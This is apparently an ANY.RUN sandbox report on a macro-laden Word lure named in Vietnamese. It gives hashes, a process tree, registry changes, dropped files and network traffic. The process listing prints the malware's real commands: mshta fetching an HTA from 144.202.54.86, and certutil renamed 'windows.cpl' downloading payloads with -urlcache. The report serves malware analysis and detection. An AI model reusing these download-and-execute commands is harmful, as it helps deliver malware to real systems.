analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Mau cam ket danh cho Dang vien.doc

Full analysis: https://app.any.run/tasks/21c5c248-035d-41e4-88a6-efc178bd039e
Verdict: Malicious activity
Analysis date: April 23, 2019, 10:12:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 936, Author: Administrator, Template: Normal, Last Saved By: Windows , Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 16 10:47:00 2016, Last Saved Time/Date: Tue Apr 23 04:40:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 54, Security: 0
MD5:

509F196AF156F4BD6C9CED1D6FEE93A0

SHA1:

B40647990E32B0D0EAD4AAC8962E47D52DD91350

SHA256:

2D499916097358B0EB5817E29188C5D7721B1B5ADAB428BD7E09BB3D9D5FBFDF

SSDEEP:

768:kqmrNT1mkxbBtA7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS6YqmL8+M0j85Q:krRZ7u6YVfMYGNvgAPoS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • windows.cpl (PID: 3380)
      • windows.cpl (PID: 2920)
      • windows.cpl (PID: 1480)
      • windows.cpl (PID: 3128)
      • windows.cpl (PID: 3396)
      • wtask.exe (PID: 3516)
      • winwsh.exe (PID: 2512)
      • InstallUtil.exe (PID: 3344)
      • wtask.exe (PID: 4064)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1480)
    • Loads the Task Scheduler COM API

      • wtask.exe (PID: 4064)
      • wtask.exe (PID: 3516)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 2384)
      • powershell.exe (PID: 2180)
      • cmd.exe (PID: 2864)
      • cmd.exe (PID: 1092)
      • cmd.exe (PID: 3816)
    • Starts application with an unusual extension

      • cmd.exe (PID: 1500)
      • cmd.exe (PID: 3624)
      • cmd.exe (PID: 1140)
      • cmd.exe (PID: 404)
      • cmd.exe (PID: 3824)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3452)
      • mshta.exe (PID: 2352)
      • powershell.exe (PID: 2180)
    • Starts Microsoft Office Application

      • cmd.exe (PID: 2568)
    • Creates files in the user directory

      • powershell.exe (PID: 2180)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2660)
      • WINWORD.EXE (PID: 3260)
    • Reads internet explorer settings

      • mshta.exe (PID: 2352)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 ?ĵ?
CompObjUserTypeLen: 28
KSOProductBuildVer: 2052-10.1.0.5864
CodePage: Windows Simplified Chinese (PRC, Singapore)
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 14
CharCountWithSpaces: 62
MMClips: -
HiddenSlides: -
Notes: -
Slides: -
Paragraphs: 1
Lines: 1
Bytes: -
Company: -
Manager: -
PresentationTarget: -
Category: -
Security: None
Characters: 54
Words: 9
Pages: 1
ModifyDate: 2019:04:23 03:40:00
CreateDate: 2016:08:16 09:47:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Windows ?û?
Template: Normal
Comments: -
Keywords: -
Author: Administrator
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
72
Monitored processes
29
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe no specs mshta.exe cmd.exe no specs cmd.exe no specs cmd.exe cmd.exe no specs windows.cpl cmd.exe no specs windows.cpl no specs cmd.exe no specs cmd.exe no specs windows.cpl winword.exe no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs powershell.exe cmd.exe cmd.exe cmd.exe cmd.exe no specs wtask.exe no specs cmd.exe no specs wtask.exe no specs cmd.exe no specs winwsh.exe no specs installutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Mau cam ket danh cho Dang vien.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2352mshta.exe http://144.202.54.86:80/download/Mau2.htaC:\Windows\system32\mshta.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3304"C:\Windows\System32\cmd.exe" /c echo cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" >C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3452"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2384cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" C:\Windows\system32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1500"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3380C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Users\admin\AppData\Local\Temp\windows.cpl
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3624"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" deleteC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2920C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" deleteC:\Users\admin\AppData\Local\Temp\windows.cplcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2568"C:\Windows\System32\cmd.exe" /c start C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 493
Read events
2 029
Write events
453
Delete events
11

Modification events

(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:lk:
Value:
6C6B3A00640A0000010000000000000000000000
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2660) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1318518814
(PID) Process:(2660) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1318518928
(PID) Process:(2660) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1318518929
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
640A00007AC9EB15BDF9D40100000000
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:sm:
Value:
736D3A00640A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:sm:
Value:
736D3A00640A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2660) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
5
Suspicious files
11
Text files
8
Unknown types
3

Dropped files

PID
Process
Filename
Type
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR63EC.tmp.cvr
MD5:
SHA256:
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF9220BC268A8882A5.TMP
MD5:
SHA256:
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF358DBE292A260F6F.TMP
MD5:
SHA256:
3260WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7820.tmp.cvr
MD5:
SHA256:
2180powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QFZ8CG4RGRW7WXU2C9SK.temp
MD5:
SHA256:
3380windows.cplC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FD092B6DA7F80290D235097A348E1E53binary
MD5:E4D8FBAA886E9C6572BEA367C1A30828
SHA256:9C23D778F32B59CC10BF13E9AD7803947F10A85B8F34D35965866B2D3DE56E82
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$u cam ket danh cho Dang vien.docpgc
MD5:1CAD32733BAAAFCF3299F306EA77C3FD
SHA256:6EF48B230BC180D0EECC66EE30D6617C90D1F3667467BBEDDC6CE5F4CE83B921
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$u cam ket danh cho Dang vien.docxpgc
MD5:1CAD32733BAAAFCF3299F306EA77C3FD
SHA256:6EF48B230BC180D0EECC66EE30D6617C90D1F3667467BBEDDC6CE5F4CE83B921
2352mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\Mau2[1].htahtml
MD5:36541C0C3ACA511F0C64F2138EDD144B
SHA256:7E88E0FA3E31FCDEB6D0A28CDF8B62D55D68704A9FED8D5F36E634D735751C06
3396windows.cplC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\19D1E7DEF74C98210EE7A07C20E8CF52text
MD5:87D9422228775F5BDAA76A3358537256
SHA256:F9330AE1705CFAD2D090B74A56B1BF21055DE37C86B2A0EE2136B02B2291A082
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
9
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3380
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Dang%20vien.docx
US
document
22.1 Kb
suspicious
3396
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
3380
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Dang%20vien.docx
US
document
22.1 Kb
suspicious
3396
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
2352
mshta.exe
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau2.hta
US
html
7.55 Kb
suspicious
3344
InstallUtil.exe
GET
200
93.184.221.240:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
55.6 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2352
mshta.exe
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
3396
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
3380
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
3344
InstallUtil.exe
144.202.54.86:443
Baltimore Technology Park, LLC
US
suspicious
93.184.221.240:80
www.download.windowsupdate.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
www.download.windowsupdate.com
  • 93.184.221.240
whitelisted

Threats

PID
Process
Class
Message
2352
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
2352
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3380
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3396
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
3396
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3396
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
2 ETPRO signatures available at the full report
No debug info